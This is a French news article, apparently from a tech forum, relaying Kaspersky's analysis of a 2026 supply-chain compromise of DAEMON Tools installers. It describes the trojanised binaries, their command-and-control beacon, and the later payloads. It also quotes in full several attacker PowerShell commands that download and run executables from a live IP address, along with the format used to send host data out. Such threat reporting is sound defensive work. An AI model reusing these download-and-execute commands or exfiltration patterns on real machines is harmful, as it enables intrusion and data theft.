Le célèbre logiciel DAEMON Tools a été infecté : une attaque de la chaîne d'approvisionnement est en cours depuis le 8 avril 2026 via les programmes d'installation distribués depuis le site officiel du logiciel
Kaspersky a révélé qu'une nouvelle attaque de la chaîne d'approvisionnement visant le célèbre logiciel DAEMON Tools avait compromis ses programmes d'installation, permettant ainsi aux pirates informatiques de diffuser une charge utile malveillante sur des appareils appartenant à des particuliers et à des organisations de plus de 100 pays, dont la France. L'analyse de la société de cybersécurité a révélé que les programmes d'installation du logiciel, notamment les versions allant de la 12.5.0.2421 à la 12.5.0.2434, avaient été infectés par un cheval de Troie à partir du 8 avril 2026. Des indices laissent supposer qu'il s'agit d'un acteur malveillant parlant chinois. Selon Kaspersky, ce déploiement suggère des opérations ciblées, même si l'objectif ultime des pirates, qu'il s'agisse de cyberespionnage ou d'attaques à motivation financière, reste pour l'instant inconnu.
DAEMON Tools est un logiciel qui permet de créer des lecteurs virtuels et de graver des disques optiques. Le programme prétend pouvoir contourner la plupart des systèmes de protection contre la copie, comme SafeDisc, SecuROM, LaserLock, CD-Cops, StarForce ou Protect CD, utilisés sur certains disques de jeux vidéo. Il est disponible pour les systèmes d'exploitation Microsoft Windows (de la version 2000 à Windows 10) et Mac OS.
Kaspersky Lab est une multinationale russe spécialisée dans la cybersécurité et les solutions antivirus, dont le siège social est situé à Moscou, en Russie. Elle a été fondée en 1997 par Eugene Kaspersky, Natalya Kaspersky et Alexey De-Monderik. Kaspersky Lab développe et commercialise des antivirus, des solutions de sécurité des terminaux, des systèmes SIEM, des solutions XDR, ainsi que d'autres produits et services liés à la cybersécurité. L'équipe mondiale de recherche et d'analyse (GReAT) de Kaspersky a été à l'origine de la découverte de plateformes d'espionnage sophistiquées mises en place par des États, telles que le groupe Equation et le ver Stuxnet. Kaspersky publie également chaque année l'enquête mondiale sur les risques liés à la sécurité informatique.
Début mai 2026, Kaspersky a découvert que les programmes d'installation du logiciel DAEMON Tools, utilisé pour monter des images disque, avaient été compromis par une charge utile malveillante. Ces programmes d'installation sont distribués depuis le site web officiel de DAEMON Tools et sont signés à l'aide de certificats numériques appartenant aux développeurs de DAEMON Tools. L'analyse de la société de sécurité a révélé que les programmes d'installation du logiciel avaient été infectés par un cheval de Troie à partir du 8 avril 2026. Plus précisément, Kaspersky a identifié que les versions de DAEMON Tools allant de la 12.5.0.2421 à la 12.5.0.2434 étaient compromises. A la date du 6 mai 2026, l'attaque de la chaîne d'approvisionnement était toujours active. Des indices suggérant que l'auteur de cette attaque est un locuteur chinois ont été identifiés dans les implants malveillants observés. La société de sécurité a contacté AVB Disc Soft, l'éditeur de DAEMON Tools, afin que des mesures supplémentaires puissent être prises pour remédier aux conséquences de l'attaque.
Dès le début du mois d'avril, Kaspersky a détecté dans ses données télémétriques plusieurs milliers de tentatives d'infection impliquant DAEMON Tools, touchant des particuliers et des organisations dans plus de 100 pays. Cependant, parmi toutes les machines infectées, l'entreprise de cybersécurité n'a observé le déploiement de charges utiles de phase avancée que sur une douzaine d'entre elles. Ces machines ayant reçu ces charges utiles appartenaient à des organisations issues des secteurs de la distribution, de la recherche scientifique, des administrations publiques et de l'industrie manufacturière, ce qui indique que cette attaque de la chaîne d'approvisionnement est de nature ciblée.
Kaspersky affirme que ses solutions sont en mesure de protéger les utilisateurs contre les charges malveillantes diffusées via l'attaque de la chaîne d'approvisionnement de DAEMON Tools.
Fichiers binaires infectés par le cheval de Troie
L'analyse de Kaspersky a révélé que, pour les versions de DAEMON Tools allant de la 12.5.0.2421 à la 12.5.0.2434, les pirates ont réussi à compromettre les fichiers binaires suivants du programmes d'installation :
- DTHelper.exe
- DiscSoftBusServiceLite.exe
- DTShellHlp.exe
Ces fichiers se trouvent dans le répertoire où DAEMON Tools est installé, par exemple C:\Program Files\DAEMON Tools Lite. Il convient de noter que ces fichiers sont signés numériquement par le développeur de DAEMON Tools, AVB Disc Soft.
Chaque fois que l'un de ces binaires est lancé, ce qui se produit au démarrage de la machine, une porte dérobée est activée. Cette porte dérobée est intégrée au code de démarrage chargé d'initialiser l'environnement CRT. Elle s'exécute dans un thread dédié, utilisé pour envoyer des requêtes GET à l'URL suivante :
https://env-check.daemontools[.]cc/2032716822411?s=<full computer name>
Le serveur utilisé pour les communications est malveillant, et son adresse est conçue pour détourner le nom de domaine légitime daemon-tools[.]cc, utilisé pour télécharger DAEMON Tools. Il est à noter que, selon les données WHOIS, le nom de domaine de ce serveur malveillant a été enregistré le 27 mars, soit environ une semaine avant le début de l'attaque de la chaîne d'approvisionnement.
Snippet of the decompiled code, responsible for forming the GET request URL string in a loop
En réponse aux requêtes envoyées, le serveur peut renvoyer une commande shell destinée à être exécutée via le processus cmd.exe. Kaspersky a constaté que cette commande shell respectait le modèle suivant :
cmd.exe /c powershell -NoProfile -Command "$wc=New-Object System.Net.WebClient;$wc.DownloadFile('http://38.180.107[.]76/<hexadecimal string>','C:\Windows\Temp\<filename>.exe')"&& %TEMP%\<filename> <arguments> &&del %TEMP%\<filename>.exe"
Comme le montre le modèle, ces commandes shell servent à télécharger et à exécuter une charge utile exécutable. Kaspersky a rencontré plusieurs types de ces charges utiles, telles que décrites ci-dessous.
Collecteur d'informations
La première charge utile observée par Kaspersky comme étant déployée par les attaquants est un collecteur d'informations. Celui-ci a été déployé à l'aide de la commande suivante :
cmd.exe /c powershell -NoProfile -Command "$wc=New-Object System.Net.WebClient;$wc.DownloadFile('http://38.180.107.76/env_check_script','C:\Windows\Temp\envchk.exe')"&&C:\Windows\Temp\envchk.exe http://38.180.107.76/09505aca4f538bd&&del %TEMP%\envchk.exe
Le fichier envchk.exe (SHA1 : 2d4eb55b01f59c62c6de9aacba9b47267d398fe4) est un exécutable .NET utilisé pour collecter des informations système détaillées. Son code contient des chaînes de caractères en chinois. Bien que cela puisse laisser supposer qu'un acteur sinophone est à l'origine de cette attaque, Kaspersky n'attribue pour l'instant la compromission de DAEMON Tools à aucun acteur en particulier.
Screenshot of the information collector code with strings in Chinese inside
Les données recueillies par le collecteur d'informations comprennent :
- Adresse MAC (premier octet non nul) ;
- Nom d'hôte ;
- Nom de domaine DNS ;
- Liste des processus en cours d'exécution, séparés par des points-virgules ;
- Liste des logiciels installés, séparés par des points-virgules ;
- Paramètres régionaux du système.
Ces informations sont envoyées au serveur C2 indiqué dans l'argument de ligne de commande du collecteur d'informations. Comme le montre la commande ci-dessus, l'adresse du serveur est :
http://38.180.107[.]76/09505aca4f538bd
Les données sont transmises dans le corps de la requête POST suivante :
a=<MAC address>&b=<hostname>&c=<DNS domain name>&d=<process list>&e=<software list>&f=<locale>
Une porte dérobée minimaliste
Tout en constatant que ce collecteur d'informations était en passe d'être déployé sur un grand nombre de machines infectées, Kaspersky a également remarqué que les pirates tentaient d'injecter une autre charge utile sur un très petit nombre de machines, soit une douzaine environ. Sur la base de ce constat, la société de cybersécurité conclut avec un haut degré de certitude que ce collecteur d'informations sert à établir le profil des machines infectées, les résultats de cette analyse étant ensuite utilisés pour déployer de manière ciblée d'autres charges utiles.
L'une des charges utiles repérées par Kaspersky est une porte dérobée minimaliste. L'entreprise de sécurité a constaté qu'elle était déployée à l'aide de la commande suivante :
cmd.exe /c powershell -NoProfile -Command "$wc=New-Object System.Net.WebClient;$wc.DownloadFile('http://38.180.107.76/b3593ac2edb34f4d4d','C:\Windows\Temp\cdg.exe')"&&powershell -NoProfile -Command "$wc=New-Object System.Net.WebClient;$wc.DownloadFile('http://38.180.107.76/368b1365bd9176b359','%TEMP%\cdg.tmp')"&&%TEMP%\cdg.exe schedsvc.dll %TEMP%\cdg.tmp first_match&&del %TEMP%\cdg.exe&&del %TEMP%\cdg.tmp"
Comme on peut le constater, cette commande sert à télécharger deux fichiers, cdg.exe et cdg.tmp. Le fichier cdg.exe, qui est ensuite exécuté, est un chargeur de shellcode qui ouvre le fichier cdg.tmp, le déchiffre à l'aide de l'algorithme RC4 (avec la clé spécifiée dans le dernier argument, à savoir first_match dans l'exemple ci-dessus), puis l'exécute en tant que shellcode.
cdg.exe shellcode loader usage
Ce shellcode constitue le corps du backdoor. La porte dérobée envoie lui-même des requêtes POST de type « heartbeat » à l'URL suivante :
http://38.180.107[.]76/79437f5edda13f9c066/version/check
Ses fonctionnalités comprennent la possibilité de télécharger des fichiers, d'exécuter des commandes shell et d'exécuter des charges utiles de type shellcode en mémoire.
Snippet of the decompiled minimalistic backdoor code, used for executing commands
Curieusement, dans certains cas, Kaspersky a constaté que cette porte dérobée minimaliste était déployée avec d'autres commandes, par exemple les suivantes :
cmd.exe /c powershell -NoProfile -Command "$wc=New-Object System.Net.WebClient;$wc.DownloadFile('http://38.180.107[.]76/407fbb423143f99fe0','C:\ProgramData\Microsoft\mcrypto.chiper')"&&powershell -NoProfile -Command "$wc=New-Object System.Net.WebClient;$wc.DownloadFile('http://38.180.107[.]76/07fbb423143f99fe07','$appdata\Microsoft\mcrypto.dat')"&&start rundll32.exe $appdata\Microsoft\mcrypto.chiper, mcrypto_clean
Et :
"cmd.exe /c powershell -NoProfile -Command "$wc=New-Object System.Net.WebClient;$wc.DownloadFile('http://38.180.107[.]76/407fbb423143f99fe0','C:\Windows\Temp\crypto.dll')"&&powershell -NoProfile -Command "$wc=New-Object System.Net.WebClient;$wc.DownloadFile('http://38.180.107[.]76/07fbb423143f99fe07','$appdata\Microsoft\mcrypto.dat')"&&start rundll32.exe %TEMP%\rypto.dll, mcrypto_clean"
Il convient de noter que ces séquences de commandes contiennent des fautes d'orthographe. Dans la première séquence de commandes, le mot « cipher » est orthographié « chiper », tandis que dans la seconde, la lettre « c » est omise dans le nom du fichier « crypto.dll ». Comme le montre la commande, la porte dérobée ne sera pas lancée en raison de ces fautes d'orthographe, ce qui semble indiquer que cette porte dérobée a été déployée dans le cadre d'une activité manuelle.
« QUIC RAT »
Après avoir examiné la manière dont les pirates ont tenté d'exploiter cette porte dérobée minimaliste, Kaspersky a découvert qu'elle avait servi à déployer un implant plus complexe, baptisé QUIC Remote Access Trojan (RAT). Alors que la société de cybersécurité a constaté que la porte dérobée minimaliste avait été déployée sur une douzaine de machines, elle a identifié QUIC RAT comme ayant été utilisé contre une seule organisation, à savoir un établissement d'enseignement situé en Russie. Ce RAT est codé en C++, obfusqué par un aplatissement du flux de contrôle et lié statiquement à la bibliothèque WolfSSL. Il inclut également le corps de la bibliothèque légitime msquic.dll dans sa section .data.
Cette porte dérobée prend en charge divers protocoles de communication C2, notamment HTTP, UDP, TCP, WSS, QUIC, DNS et HTTP/3. Bien que son analyse soit toujours en cours, Kaspersky a constaté que QUIC RAT est capable d'injecter des charges utiles dans les processus notepad.exe et conhost.exe.
Victimologie
Depuis le 8 avril, date à laquelle la première version infectée de DAEMON Tools a été déployée, Kaspersky a observé des milliers de tentatives de déploiement de charges utiles via les fichiers binaires compromis. Il s'agit là d'un chiffre particulièrement élevé, qui témoigne de l'ampleur de cette attaque.
La société de cybersécurité a observé ces déploiements sur des appareils appartenant aussi bien à des particuliers qu'à des organisations dans plus de 100 pays et territoires, la majorité des victimes se trouvant en Russie, au Brésil, en Turquie, en Espagne, en Allemagne, en France, en Italie et en Chine.
L'analyse de Kaspersky montre que 10 % des systèmes touchés appartiennent à des entreprises et à des organisations. Les pirates ont tenté d'infecter la plupart des machines touchées uniquement avec la charge utile du collecteur d'informations. Cependant, l'autre charge utile de porte dérobée, plus complexe, n'a été observée que sur une douzaine de machines appartenant à des organismes gouvernementaux, scientifiques, industriels et commerciaux situés en Russie, en Biélorussie et en Thaïlande. Cette manière de déployer la porte dérobée sur un petit sous-ensemble de machines infectées indique clairement que l'attaquant avait l'intention de mener l'infection de manière ciblée. Cependant, son intention – qu'il s'agisse de cyberespionnage ou de « chasse au gros gibier » – n'est pas claire pour l'instant.
Recommandations et conclusion
Forte de sa longue expérience dans l'analyse des attaques visant la chaîne d'approvisionnement, Kaspersky a conclu que les pirates ont orchestré la compromission de DAEMON Tools de manière extrêmement sophistiquée. Par exemple, le temps qu'il a fallu pour détecter cette attaque, soit environ un mois, est comparable à celui de l'attaque de la chaîne d'approvisionnement de 3CX sur laquelle la société de cybersécurité a mené des recherches en collaboration avec la communauté de la cybersécurité en 2023. Compte tenu de la grande complexité de l'attaque, Kaspersky recommande aux organisations d'examiner minutieusement les machines sur lesquelles DAEMON Tools était installé, afin de détecter toute activité anormale liée à la cybersécurité survenue à partir du 8 avril.
« Cela fait à peine quatre mois que l'année 2026 a commencé, et au cours de cette courte période, nous avons constaté une augmentation du nombre d'attaques de la chaîne d'approvisionnement signalées. Nous avons enquêté sur eScan en janvier, Notepad++ en février, CPU-Z en avril, et maintenant DAEMON Tools en mai », a déclaré Kaspersky. « Compte tenu de cette recrudescence des attaques de la chaîne d'approvisionnement, les organisations doivent faire preuve d'une grande prudence lorsqu'elles choisissent les logiciels qu'elles décident d'installer. Parallèlement, cela indique que les applications largement utilisées et réputées fiables constituent un vecteur de compromission précieux pour les attaquants en raison de leur impact potentiel considérable. Il convient de garder cela à l'esprit lors de la planification de la stratégie de cybersécurité d'une organisation, afin de garantir une mise en œuvre solide de la stratégie "zero trust". »
La société de cybersécurité indique qu'elle a largement contribué à l'analyse et à la mise au jour d'incidents à grande échelle touchant la chaîne d'approvisionnement en 2026, en partageant ses conclusions techniques avec la communauté de la cybersécurité par le biais des rapports « Threat Response ». Les solutions Kaspersky permettent, selon l'entreprise, une détection rapide et une protection efficace contre ces types d'attaques.
Source : Kaspersky (Igor Kuznetsov , Georgy Kucherin , Leonid Bezvershenko , Anton Kargin)
Et vous ?
Quel est votre avis sur le sujet ?
Trouvez-vous les conclusions de cette analyse de Kaspersky crédibles ou pertinentes ?
Voir aussi :
Kaspersky lance un scanner de malwares pour Linux, mais à qui faire le plus confiance ? Les malwares ou Kaspersky ? Avec le logiciel russe Kaspersky, vous êtes sûr que la NSA n'aura pas accès à vos données
De nombreux Américains continuent d'utiliser Kaspersky, malgré l'interdiction de la suite de sécurité par les USA en raison de risques hypothétiques de sécurité liés à la Russie
L'entreprise russe de cybersécurité Kaspersky Lab ferme sa division américaine et licencie son personnel, après l'interdiction de la vente de ses produits aux États-Unis
DAEMON Tools a été infecté : une attaque de la chaîne d'approvisionnement est en cours depuis le 8 avril 2026
Répondre avec citation
Partager